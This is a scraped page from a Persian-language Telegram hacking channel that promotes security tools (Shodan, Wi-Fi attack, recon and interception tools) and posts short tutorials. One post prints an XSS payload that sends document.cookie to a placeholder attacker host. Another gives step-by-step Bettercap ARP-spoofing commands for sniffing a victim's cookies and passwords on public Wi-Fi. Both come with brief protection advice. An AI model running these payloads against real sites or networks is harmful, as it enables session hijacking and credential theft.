hack4man | Unsorted

Telegram-канал hack4man - Hack 4҉҈ Man

13157

@durov Этот пост ни в коем случае не аморален. Этот канал является фан-каналом, и мы не публикуем какой-либо аморальный #telegram_Rules #Правила_телеграма

Subscribe to a channel

Hack 4҉҈ Man

💻 ؛ShodanX — ابزار پیشرفته برای تعامل با API شادان و انجام OSINT

🔺؛ShodanX یک ابزار خط فرمان قدرتمند است که برای جستجو و جمع‌آوری مؤثر اطلاعات درباره دستگاه‌های متصل به اینترنت از طریق پلتفرم شادان طراحی شده است.

🔺؛ShodanX کار با فیلترهای شادان را ساده می‌کند، از صادرات نتایج پشتیبانی می‌کند و به سرعت به کشف نقاط ورود احتمالی یا نشت داده‌ها در شبکه جهانی کمک می‌کند.

لینک به گیت‌هاب

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🔸️؛WEF (چارچوب بهره‌برداری از وای‌فای) — چارچوبی برای ارزیابی امنیت و حملات به شبکه‌های وای‌فای

🔹️؛WEF ابزاری جامع برای خودکارسازی تست نفوذ در شبکه‌های بی‌سیم است. امکان انجام طیف گسترده‌ای از حملات را فراهم می‌کند، از جمله ایجاد «دوقلوهای شرور» (Evil Twin)، بهره‌برداری از آسیب‌پذیری‌های WPS و رهگیری دست‌دادن‌های WPA به صورت خودکار.

🌐 لینک گیت‌هاب

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

💻 ؛LitterBox محیط ایزوله امن برای اجرای کد

🔸️؛LitterBox ابزاری است برای ایجاد محیطی ایزوله جهت اجرای امن کدهای غیرقابل اعتماد یا دلخواه.

🌐 لینک به گیت‌هاب

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🚀 معرفی ابزار قدرتمند AutoRecon — شناسایی شبکه با سرعت و دقت بالا!

✨؛AutoRecon یک ابزار پیشرفته و چندرشته‌ای (Multi-threaded) برای شناسایی شبکه (Network Reconnaissance) است که به صورت خودکار سرویس‌های فعال را در شبکه شما فهرست می‌کند.

💻 این ابزار هوشمند، به طور خاص برای صرفه‌جویی در زمان شما در چالش‌های CTF (Capture The Flag) و محیط‌های تست نفوذ (Penetration Testing) مانند OSCP طراحی شده است. با قابلیت‌های خودکارسازی و سرعت بالا، AutoRecon به شما کمک می‌کند تا فرآیند شناسایی را به شکل چشمگیری تسریع بخشید و بر روی جنبه‌های مهم‌تر تست تمرکز کنید.

🔗 لینک گیت‌هاب

#AutoRecon #NetworkReconnaissance #PenetrationTesting #CTF #OSCP #CyberSecurity #HackingTools #InfoSec #NetworkScanning

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🚀 ؛MITMproxy: ابزاری برای شنود ترافیک HTTP(S)

🔍؛MITMproxy ابزاری فوق‌العاده برای تحلیل و شنود ترافیک شبکه، با امکان شنود ترافیک HTTP/HTTPS!

- ✅ مناسب برای اشکال‌زدایی وب‌اپلیکیشن‌ها
- 🔒 آزمون امنیت شبکه‌ها و اپلیکیشن‌ها
- 📚 ایده‌آل برای آموزش و تحقیقات

🖥️ این ابزار را می‌توان در کنسول و مرورگر اجرا کرد و با افزودن گواهی‌نامه، شنود HTTP(S) امکان‌پذیر است! همچنین از شنود ترافیک اندروید نیز پشتیبانی می‌کند.

🔗 لینک به GitHub:
https://github.com/mitmproxy/mitmproxy

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

📢 مخزن روز: Awesome Pentest 🔍

مخزن روز چیست؟ 
؛"Awesome Pentest" مجموعه‌ای دقیق از ابزارها، مطالب و راهنماها برای کسانی است که می‌خواهند در تست نفوذ استاد شوند. 💻✨

داخلش چی هست:
— فریم‌ورک‌ها و اسکریپت‌های مفید برای پنتست. 
— مطالب آموزشی برای یادگیری تکنیک‌ها و رویکردهای جدید. 
— راهنماهایی برای تنظیم ابزارها و استفاده از آن‌ها. 

برای چه کسانی؟
— برای مبتدیان تا اصول را بفهمند. 
— برای پنتسترهای باتجربه تا ابزارهای مفید جدید را پیدا کنند. 

🔗 لینک به GitHub: Awesome Pentest

#AwesomePentest #Pentesting #EthicalHacking #CyberSecurity #InfoSec #Hacking #NetworkSecurity #Learning #GitHub #TechTools #SecurityTesting #PenetrationTesting #CyberDefense

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🌐؛GeoVista سامانه عاملی استدلال بصری با افزونه وب برای موقعیت‌یابی دقیق جغرافیایی

🔹️؛GeoVista یک سامانه پیشرفته مبتنی بر عامل‌های هوش مصنوعی است که برای تعیین موقعیت جغرافیایی از روی تصاویر (موقعیت‌یابی جغرافیایی) با استفاده از استراتژی‌های استدلال بصری و جستجوی خارجی طراحی شده است.

🔸️این پروژه مسائل پیچیده «جهت‌یابی بصری» را با تقلید از عملکرد یک کارشناس حل می‌کند: عامل جزئیات عکس (معماری، تابلوهای راهنمایی، چشم‌انداز) را تحلیل کرده و از جستجوی وب برای بررسی فرضیات استفاده می‌کند.

📌لینک گیت‌هاب
https://github.com/BlackSnufkin/LitterBox

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

💻 ؛XSS — دزدیدن کوکی در یک ثانیه از طریق سایت دیگر

یک آسیب‌پذیری که ۲۰ سال قدمت دارد، اما هنوز هم هکرها را به پنل‌های مدیریت در سراسر جهان راه می‌دهد.

🎯 ماهیت: هکر در سایت یک فرم یا پارامتری پیدا می‌کند که <script> را فیلتر نمی‌کند. کد خود را در آن قرار می‌دهد. قربانی صفحه را باز می‌کند — کد اجرا می‌شود.

مثال دزدیدن کوکی (کوکی جلسه، جایی که رمز عبور به صورت رمزنگاری شده ذخیره شده):

<script>
  fetch('http://хакер.ру/steal?cookie=' + document.cookie);
</script>

حالا هکر جلسه قربانی را دارد. کوکی را در مرورگر قرار می‌دهد — و بدون رمز عبور با حساب او وارد می‌شود.

🟢 حفاظت:
- کاراکترهای خاص را بررسی کنید (htmlspecialchars)

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🔸یک پراکسی تمام ترافیک را دریافت می‌کند و آن را بین چندین سرور تقسیم می‌کند تا بار را متعادل کند.

🔹اما اختلال کلودفلر نشان داد: اگر خود پراکسی خراب شود، اصلاً مهم نیست چند سرور پشت آن دارید. یک پیکربندی نادرست و کل edge عملاً خودش را دچار حمله دیداس کرده است.

#هکینگ #امنیت #اطلاعات

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

👾 vt-cli.

سرویس VirusTotal ابزار CLI مخصوص به خودش را دارد. می‌توانید لینک را بررسی کنید، فایل را اسکن کنید و اطلاعات مربوط به مقدار هش را دریافت کنید. تنها چیزی که برای استفاده نیاز دارید، کلید API است (که برای همه هنگام ثبت‌نام در دسترس است). اینجا بیشتر توضیح داده شده است:

➡ https://virustotal.github.io/vt-cli/

🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

🚀؛ Awesome-Red-Team-Operations شامل فهرست گسترده‌ای از ابزارها، اسکریپت‌ها و منابع مفید برای متخصصان تست نفوذ می‌باشد.

💻 برای دسترسی به این منابع ارزشمند، به لینک زیر مراجعه کنید: 
👉 Awesome-Red-Team-Operations در گیت‌هاب

#امنیت_سایبری #تست_نفوذ #هک_اخلاقی #ابزارهای_امنیتی #CyberSecurity #RedTeam #آموزش_آنلاین
🛡@ir_c_a

Читать полностью…

Hack 4҉҈ Man

📡 اسنیفینگ در شبکه‌ها: چگونه هکرها ترافیک شما را می‌خوانند 🔍

بزن بریم! تصور کن: تو در یک کافه هستی و به وای‌فای باز متصل شده‌ای. ایمیل‌هایت را باز می‌کنی، وارد بانک می‌شوی. فکر می‌کنی در امان هستی؟ اما هکری در همان کافه در حال «گوش دادن» به ترافیک تو است و هر چیزی که لازم دارد را برمی‌دارد. این همان اسنیفینگ است! 🚨

🔑 اسنیفینگ چیست؟
اسنیفینگ به معنای رهگیری ترافیک شبکه است. مثل گذاشتن شنود روی تلفن، فقط به جای صدا، داده‌ها را می‌گیرد: رمزهای عبور، کوکی‌ها، توکن‌های احراز هویت و غیره.

⚙️ چگونه کار می‌کند؟
اسنیفینگ زمانی ممکن است که:
• شبکه محافظت نشده باشد (وای‌فای باز)
• رمزگذاری ضعیف استفاده شود (یا اصلاً نباشد)
• ترافیک از یک کانال عبور کند که برای چند دستگاه قابل دسترسی باشد

🛠️ نمونه‌هایی از اسنیفرها:
• Wireshark: قدرتمندترین اسنیفر با گرافیک و فیلترهای پیشرفته
• tcpdump: ابزار خط فرمان برای کار سریع روی سرورها
• Bettercap: اسنیفینگ + حملات نوع MITM (جایگزینی DNS، گرفتن کوکی‌ها و غیره)

🚨 مثال حمله اسنیفینگ (گام به گام):
1. به همان شبکه وای‌فای که قربانی متصل است وصل می‌شویم.
2. برنامه Bettercap یا Wireshark را اجرا می‌کنیم.
3. آدرس IP قربانی را مشخص می‌کنیم:
  

   net.probe on
   net.show
  

4. رهگیری بسته‌ها را فعال می‌کنیم:
  
   set arp.spoof.targets <IP-قربانی>
   arp.spoof on
   net.sniff on
  

5. لذت ببرید: کوکی‌ها، نام‌های کاربری، رمزهای عبور را دریافت می‌کنیم (اگر ترافیک رمزگذاری نشده باشد).

🛡️ چگونه محافظت کنیم؟
• هرگز بدون VPN از وای‌فای عمومی وارد نشوید.
• همیشه از HTTPS استفاده کنید.
• افزونه‌هایی مانند HTTPS Everywhere را نصب کنید.
• در شبکه‌های باز به سرویس‌های مهم وارد نشوید.

🔒 با آگاهی و احتیاط، امنیت خود را حفظ کنید!

#اسنیفینگ #امنیت_شبکه #هک #لینوکس #Wireshark #VPN #HTTPS

🚫 @ir_c_a

Читать полностью…
Subscribe to a channel